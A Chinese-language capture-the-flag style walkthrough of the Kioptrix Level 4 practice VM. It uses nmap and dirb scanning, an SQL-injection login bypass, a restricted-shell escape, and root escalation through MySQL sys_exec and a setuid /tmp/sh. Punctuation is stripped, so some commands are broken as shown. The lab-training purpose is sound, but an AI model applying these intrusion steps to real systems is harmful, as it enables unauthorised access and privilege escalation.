Kioptrix Level4注kioptrix level 4下载之后为vmare.vmdk文件需要新建虚拟机时选择使用现有虚拟硬盘后导入.vmdk文件即可1.主机扫描或使用nmap 192.168.68.0/24 -sP2.端口扫描nmap -sV 192.168.68.1323.目录扫描dirb http://192.168.68.132dirsearch -u 192.168.68.1324.访问默认80端口为登陆界面扫描目录发现类似用户名的目录john猜测使用john和万能密码登陆 a or 1 -- a登陆后得到一组账号密码UsernamejohnPassword:MyNameIsJohn猜测尝试ssh登陆5.ssh登陆后用户权限非常低提权shell逃逸管理员为了安全将用户的 Shell 限制为受限模式如 rbash、rksh只能查询echo命令是否能利用echo os.system(/bin/bash)6.收集系统信息cat /etc/*-releaseps -ef |grep root 发现mysql服务切换网站所在默认目录查看是否有关键信息/var/www/目录下文件都是提升MySQL用户root密码为空。下一步登录mysql数据库7.登陆mysql mysql提权查看mysql允许执行命令的函数mysql -urootshow databases;Use members;查询到john及robert用户账号密码use mysqlshow tablesselect * from func;Mysql可利用执行命令提升权限函数sys_exec通过网页查询两个方法提权为rootselect sys_exec(sudo usermod -a -G admin john);select sys_exec(cp /bin/sh /tmp/;chown root:root /tmp/sh;chmod s /tmp/sh);